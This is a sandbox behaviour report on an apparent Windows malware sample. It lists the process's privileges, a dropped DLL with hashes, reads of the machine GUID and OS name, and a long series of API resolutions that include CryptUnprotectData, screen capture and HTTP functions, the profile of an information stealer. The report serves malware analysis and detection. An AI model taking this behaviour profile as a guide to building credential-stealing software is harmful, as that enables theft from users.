Unmonitor End Time: 00:04:44, Reason: Terminated by Timeout
Monitor Duration 00:03:03
OS Process Information
»
Information Value
PID 0x874
Parent PID 0x2c8 (c:\users\5p5nrgjn0js halpmcxz\desktop\eb54.tmp.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 870
0x 810
0x 80C
0x 808
0x 804
0x 648
0x 59C
0x 5D0
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
buffer 0x01B1C1F0 0x01B3195F Marked Executable - 32-bit - False False
...
buffer 0x01B1C1F0 0x01B3195F Content Changed - 32-bit 0x01B1D004, 0x01B1C1F0 False False
...
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-console-l1-1-0.dll 18.30 KB MD5: 502263c56f931df8440d7fd2fa7b7c00
SHA1: 523a3d7c3f4491e67fc710575d8e23314db2c1a2
SHA256: 94a5df1227818edbfd0d5091c6a48f86b4117c38550343f780c604eee1cd6231
SSDeep: 192:3jBMWIghWGZiKedXe123Ouo+Uggs/nGfe4pBjS/uBmWh0txKdmVWQ4GWDZoiyqnP:GWPhWVXYi00GftpBjSemTltcwpS 		False
...
Host Behavior
File (6)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-console-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create Directory C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\ - True 1
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Open STD_OUTPUT_HANDLE - True 1
Fn
Open STD_ERROR_HANDLE - True 1
Fn
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-console-l1-1-0.dll size = 18744 True 1
Fn
Data
Registry (10)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography value_name = MachineGuid, data = 0303d5b4-ffe9-470e-9dd8-7d9ec416e53f, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = ProductName, data = Windows 7 Professional, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography value_name = MachineGuid, data = 0303d5b4-ffe9-470e-9dd8-7d9ec416e53f, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = ProductName, data = Windows 7 Professional, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = ProductName, data = Windows 7 Professional, type = REG_SZ True 1
Fn
Module (405)
»
Operation Module Additional Information Success Count Logfile
Load KERNEL32.DLL base_address = 0x76c20000 True 1
Fn
Load ADVAPI32.dll base_address = 0x74d40000 True 1
Fn
Load GDI32.dll base_address = 0x75ad0000 True 1
Fn
Load ole32.dll base_address = 0x755e0000 True 4
Fn
Load SHELL32.dll base_address = 0x75fd0000 True 1
Fn
Load USER32.dll base_address = 0x74f40000 True 1
Fn
Load WINHTTP.dll base_address = 0x73660000 True 1
Fn
Load WINSPOOL.DRV base_address = 0x735b0000 True 1
Fn
Load kernel32.dll base_address = 0x76c20000 True 5
Fn
Load user32.dll base_address = 0x74f40000 True 3
Fn
Load advapi32.dll base_address = 0x74d40000 True 3
Fn
Load oleaut32.dll base_address = 0x75220000 True 1
Fn
Load gdi32.dll base_address = 0x75ad0000 True 1
Fn
Load msvcr100.dll base_address = 0x749c0000 True 1
Fn
Load crypt32.dll base_address = 0x759b0000 True 1
Fn
Load crtdll.dll base_address = 0x6c240000 True 1
Fn
Load Gdiplus.dll base_address = 0x72c90000 True 7
Fn
Load shell32.dll base_address = 0x75fd0000 True 1
Fn
Load ntdll.dll base_address = 0x77130000 True 1
Fn
Load wininet.dll base_address = 0x753d0000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 13
Fn
Get Handle c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\5.exe base_address = 0x400000 True 1
Fn
Get Handle wininet.dll base_address = 0x0 False 1
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\5.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\5.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetVolumeMountPointA, address_out = 0x76cbc2b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleCursorPosition, address_out = 0x76cd7adf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalReAlloc, address_out = 0x76c359bf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x76c31700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetNamedPipeHandleStateW, address_out = 0x76cb197c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoA, address_out = 0x76c30e00 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OpenMutexW, address_out = 0x76c35151 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLongPathNameW, address_out = 0x76c3a315 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateNamedPipeA, address_out = 0x76cb1807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileA, address_out = 0x76c558e5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalGetAtomNameA, address_out = 0x76ca95b4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommMask, address_out = 0x76cb6bcd True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x76c31245 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = PurgeComm, address_out = 0x76cb70f6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentDirectoryA, address_out = 0x76c5d4f6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfoExA, address_out = 0x76cc5a1f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DuplicateHandle, address_out = 0x76c31886 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFileEx, address_out = 0x76cb45ef True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstVolumeW, address_out = 0x76cb429f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVolumeInformationW, address_out = 0x76c4c860 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x76c3588e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetWaitableTimer, address_out = 0x76c5bb2f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x76c317d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleOutputCP, address_out = 0x76c49b0f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleA, address_out = 0x76c312fc True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoA, address_out = 0x76c4d5e5 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeA, address_out = 0x76c58266 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringA, address_out = 0x76c5bc39 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetPriorityClass, address_out = 0x76cb438f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetHandleCount, address_out = 0x76c3cb29 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimes, address_out = 0x76cb358d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommConfig, address_out = 0x76cb80c1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetTapeParameters, address_out = 0x76cbd368 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommProperties, address_out = 0x76cb6cdf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x76c3dd0e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindCloseChangeNotification, address_out = 0x76c4efd4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetNamedPipeHandleStateA, address_out = 0x76cb1e79 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentActCtx, address_out = 0x76c4d551 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EndUpdateResourceW, address_out = 0x76cc3ace True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SystemTimeToTzSpecificLocalTime, address_out = 0x76c50652 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalCompact, address_out = 0x76caefc6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleInputW, address_out = 0x76cd7004 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateTimerQueue, address_out = 0x76c5b020 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetupComm, address_out = 0x76cb6a07 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnregisterWait, address_out = 0x76cbe6ab True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFullPathNameW, address_out = 0x76c340d4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetPrivateProfileSectionNamesW, address_out = 0x76caa1ea True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameA, address_out = 0x76c4b6e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x76c349d7 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x76c3110c True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapCreate, address_out = 0x76c34a2d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x76c310ff True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76c314b1 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedIncrement, address_out = 0x76c31400 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedDecrement, address_out = 0x76c313f0 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RevertToSelf, address_out = 0x74d51562 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = QueryServiceLockStatusW, address_out = 0x74da1df1 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = QueryServiceConfigA, address_out = 0x74d69a4f True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = EnumServicesStatusW, address_out = 0x74da2221 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = StartServiceW, address_out = 0x74d47974 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ImpersonateSelf, address_out = 0x74d4ae8c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ReportEventA, address_out = 0x74d43ee9 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = SetPrivateObjectSecurityEx, address_out = 0x74d83503 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegEnumKeyW, address_out = 0x74d5445b True 2
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetDeviceGammaRamp, address_out = 0x75b0dd76 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetEnhMetaFileW, address_out = 0x75aed753 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CreateHalftonePalette, address_out = 0x75aecee2 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CopyMetaFileW, address_out = 0x75af960c True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = EnumMetaFile, address_out = 0x75af72ea True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = UnrealizeObject, address_out = 0x75aec9ae True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = PolyDraw, address_out = 0x75b15d87 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = OffsetRgn, address_out = 0x75aeb3d4 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetFontUnicodeRanges, address_out = 0x75aec95d True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetTextExtentExPointW, address_out = 0x75af6815 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = ResetDCW, address_out = 0x75afe2db True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SwapBuffers, address_out = 0x75b159fb True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CloseFigure, address_out = 0x75b154af True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoDosDateTimeToFileTime, address_out = 0x756c78c9 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleSaveToStream, address_out = 0x75644434 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleMetafilePictFromIconAndLabel, address_out = 0x7565f9ba True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CreateStreamOnHGlobal, address_out = 0x7560363b True 2
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoLockObjectExternal, address_out = 0x7566e871 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoRevertToSelf, address_out = 0x755f0065 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleCreateEmbeddingHelper, address_out = 0x75661173 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = FindExecutableW, address_out = 0x75fd22f9 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = DuplicateIcon, address_out = 0x761d49ac True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListA, address_out = 0x760f1c24 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetDataFromIDListW, address_out = 0x760025db True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ExtractAssociatedIconA, address_out = 0x761d4efe True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = DragQueryFileA, address_out = 0x761e50b1 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = HiliteMenuItem, address_out = 0x74fb850f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetClipboardViewer, address_out = 0x74fb8111 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetCaretPos, address_out = 0x74f7eef6 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DdeConnectList, address_out = 0x74f9ee95 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x74f59679 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadKeyboardLayoutA, address_out = 0x74f9bb35 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DialogBoxParamA, address_out = 0x74f9cb0c True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetDialogBaseUnits, address_out = 0x74f78941 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = IsCharAlphaNumericA, address_out = 0x74f66867 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ToUnicodeEx, address_out = 0x74fb0193 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EnumWindowStationsW, address_out = 0x74f986b4 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CallMsgFilterW, address_out = 0x74f7d1e8 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClipboardFormatA, address_out = 0x74f60afa True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetNextDlgGroupItem, address_out = 0x74fa23a7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExA, address_out = 0x74f5db98 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = IsCharAlphaA, address_out = 0x74f78fa0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ChangeDisplaySettingsW, address_out = 0x74fa08b5 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ToAscii, address_out = 0x74f99005 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = IsZoomed, address_out = 0x74f63332 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EnumWindowStationsA, address_out = 0x74f602d6 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CharPrevExA, address_out = 0x74fb4dd7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefFrameProcA, address_out = 0x74f67fbb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CharNextA, address_out = 0x74f57a1b True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMenuItemInfoW, address_out = 0x74f65b20 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = AnyPopup, address_out = 0x74fb548c True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = WinHelpA, address_out = 0x74f7557f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMenu, address_out = 0x74f65041 True 1
Fn
Get Address c:\windows\syswow64\winhttp.dll function = WinHttpQueryOption, address_out = 0x7367ec68 True 1
Fn
Get Address c:\windows\syswow64\winhttp.dll function = WinHttpSetCredentials, address_out = 0x736945d7 True 1
Fn
Get Address c:\windows\syswow64\winhttp.dll function = WinHttpCrackUrl, address_out = 0x7367953a True 1
Fn
Get Address c:\windows\syswow64\winspool.drv function = DeviceCapabilitiesA, address_out = 0x735baa78 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 8
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSection, address_out = 0x77162c42 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalFree, address_out = 0x76c32d3c True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalAlloc, address_out = 0x76c3168c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersion, address_out = 0x76c34467 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetThreadLocale, address_out = 0x76c335cf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = GetKeyboardType, address_out = 0x74f99ac4 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxA, address_out = 0x74fafd1e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExA, address_out = 0x74d548ef True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExA, address_out = 0x74d54907 True 2
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x74d5469d True 2
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SysFreeString, address_out = 0x75223e59 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SysReAllocStringLen, address_out = 0x75227810 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SysAllocStringLen, address_out = 0x752245d2 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegEnumKeyA, address_out = 0x74d6a299 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = FreeSid, address_out = 0x74d5412e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalUnlock, address_out = 0x76c4cfdf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalLock, address_out = 0x76c4d0a7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemInfo, address_out = 0x76c349ca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileAttributesW, address_out = 0x76c31b18 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x76c34435 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileW, address_out = 0x76c389b3 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryW, address_out = 0x76c34259 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileW, address_out = 0x76c5830d True 2
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SelectObject, address_out = 0x75ae4f70 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = DeleteObject, address_out = 0x75ae5689 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = DeleteDC, address_out = 0x75ae58b3 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CreateCompatibleDC, address_out = 0x75ae54f4 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CreateCompatibleBitmap, address_out = 0x75ae5f49 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = BitBlt, address_out = 0x75ae5ea6 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ReleaseDC, address_out = 0x74f57446 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetSystemMetrics, address_out = 0x74f57d2f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetDC, address_out = 0x74f572c4 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CharToOemBuffA, address_out = 0x74f6b1b0 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleInitialize, address_out = 0x755fefd7 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstance, address_out = 0x75629d0b True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749dc544 True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptUnprotectData, address_out = 0x759e5a7f True 1
Fn
Get Address c:\windows\syswow64\crtdll.dll function = wcscmp, address_out = 0x6c25032a True 1
Fn
